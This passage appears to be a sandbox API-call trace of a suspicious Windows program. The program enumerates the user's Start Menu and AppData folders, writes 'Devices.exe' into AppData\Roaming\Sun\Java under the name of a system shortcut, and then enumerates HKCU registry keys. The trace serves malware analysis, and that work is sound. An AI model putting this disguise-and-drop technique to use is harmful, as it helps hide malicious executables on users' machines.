returned 0xb07218 [0057.709] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.709] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.709] PathMatchSpecW (pszFile="Desktop.ini", pszSpec="*") returned 1 [0057.709] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.709] PathMatchSpecW (pszFile="Magnify.lnk", pszSpec="*") returned 1 [0057.709] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.709] PathMatchSpecW (pszFile="Narrator.lnk", pszSpec="*") returned 1 [0057.709] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.709] PathMatchSpecW (pszFile="On-Screen Keyboard.lnk", pszSpec="*") returned 1 [0057.709] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0057.709] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0057.710] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.710] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Accessories" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories" [0057.710] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*" [0057.710] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb07218 [0057.710] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.710] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.710] PathMatchSpecW (pszFile="Desktop.ini", pszSpec="*") returned 1 [0057.710] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.711] PathMatchSpecW (pszFile="Internet Explorer.lnk", pszSpec="*") returned 1 [0057.711] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.711] PathMatchSpecW (pszFile="Notepad.lnk", pszSpec="*") returned 1 [0057.711] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0057.711] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0057.711] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.711] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Administrative Tools" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools" [0057.711] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*" [0057.711] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb07318 [0057.712] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.712] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.712] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0057.712] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0057.712] FindClose (in: hFindFile=0xb07318 | out: hFindFile=0xb07318) returned 1 [0057.713] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.713] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0057.713] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.713] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Maintenance" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance" [0057.713] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*" [0057.713] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb07218 [0057.713] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.713] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.713] PathMatchSpecW (pszFile="Desktop.ini", pszSpec="*") returned 1 [0057.714] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0057.714] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0057.714] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.714] PathMatchSpecW (pszFile="OneDrive.lnk", pszSpec="*") returned 1 [0057.714] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.714] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Startup" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" [0057.714] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*" [0057.714] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb07418 [0057.714] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.715] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.715] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0057.715] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0057.715] FindClose (in: hFindFile=0xb07418 | out: hFindFile=0xb07418) returned 1 [0057.715] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.715] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="System Tools" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools" [0057.715] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\*" [0057.715] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb07218 [0057.716] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.716] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.716] PathMatchSpecW (pszFile="Command Prompt.lnk", pszSpec="*") returned 1 [0057.716] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.716] PathMatchSpecW (pszFile="computer.lnk", pszSpec="*") returned 1 [0057.716] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.716] PathMatchSpecW (pszFile="Control Panel.lnk", pszSpec="*") returned 1 [0057.716] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.716] PathMatchSpecW (pszFile="Default Apps.lnk", pszSpec="*") returned 1 [0057.716] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.716] PathMatchSpecW (pszFile="Desktop.ini", pszSpec="*") returned 1 [0057.716] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.717] PathMatchSpecW (pszFile="Devices.lnk", pszSpec="*") returned 1 [0057.717] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.717] PathMatchSpecW (pszFile="File Explorer.lnk", pszSpec="*") returned 1 [0057.717] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.717] PathMatchSpecW (pszFile="Run.lnk", pszSpec="*") returned 1 [0057.717] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.717] PathMatchSpecW (pszFile="Windows Defender.lnk", pszSpec="*") returned 1 [0057.717] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0057.717] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0057.717] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.717] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Windows PowerShell" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell" [0057.718] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell\\*" [0057.718] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb07218 [0057.718] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.718] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.718] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0057.718] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.718] PathMatchSpecW (pszFile="Windows PowerShell (x86).lnk", pszSpec="*") returned 1 [0057.718] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.718] PathMatchSpecW (pszFile="Windows PowerShell ISE (x86).lnk", pszSpec="*") returned 1 [0057.718] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.719] PathMatchSpecW (pszFile="Windows PowerShell ISE.lnk", pszSpec="*") returned 1 [0057.719] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.719] PathMatchSpecW (pszFile="Windows PowerShell.lnk", pszSpec="*") returned 1 [0057.719] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0057.719] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0057.719] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0057.719] FindClose (in: hFindFile=0xb07558 | out: hFindFile=0xb07558) returned 1 [0057.719] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.719] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0057.720] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.720] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Templates" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Templates") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Templates" [0057.720] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Templates", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*" [0057.720] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb071d8 [0057.720] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.720] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.720] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0057.721] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.721] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Themes" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes" [0057.721] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*" [0057.721] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb071d8 [0057.721] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.721] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.721] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes", pszFile="CachedFiles" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles" [0057.721] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\*" [0057.721] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb07218 [0057.722] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.722] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.722] PathMatchSpecW (pszFile="CachedImage_1440_900_POS4.jpg", pszSpec="*") returned 1 [0057.722] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0057.722] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0057.722] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.722] PathMatchSpecW (pszFile="TranscodedWallpaper", pszSpec="*") returned 1 [0057.722] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.723] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0057.723] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0057.723] FindClose (in: hFindFile=0xb072d8 | out: hFindFile=0xb072d8) returned 1 [0057.723] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 0 [0057.723] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0057.724] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ae278 | out: lpFindFileData=0x9ae278) returned 1 [0057.724] PathCombineW (in: pszDest=0x9ae4c8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="Sun" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun" [0057.724] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\*" [0057.724] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\*", lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 0xb07318 [0057.725] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.725] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.725] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun", pszFile="Java" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java" [0057.725] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\*" [0057.725] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb07158 [0057.725] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.726] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.726] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java", pszFile="Deployment" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment" [0057.726] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment\\*" [0057.726] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb071d8 [0057.726] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.726] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.726] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0057.727] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0057.727] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0057.727] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 0 [0057.727] FindClose (in: hFindFile=0xb07318 | out: hFindFile=0xb07318) returned 1 [0057.727] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ae278 | out: lpFindFileData=0x9ae278) returned 0 [0057.727] FindClose (in: hFindFile=0xb070d8 | out: hFindFile=0xb070d8) returned 1 [0057.728] PathFindExtensionW (pszPath="Devices.lnk") returned=".lnk" [0057.728] PathCombineW (in: pszDest=0x9aee88, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java", pszFile="Devices.exe" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe" [0057.728] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\sun\\java\\devices.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0057.729] CloseHandle (hObject=0x210) returned 1 [0057.729] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xd, lpSecurityAttributes=0x0, phkResult=0x9aeb34, lpdwDisposition=0x0 | out: phkResult=0x9aeb34*=0x210, lpdwDisposition=0x0) returned 0x0 [0057.730] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.730] RegEnumKeyW (in: hKey=0x210, dwIndex=0x1a, 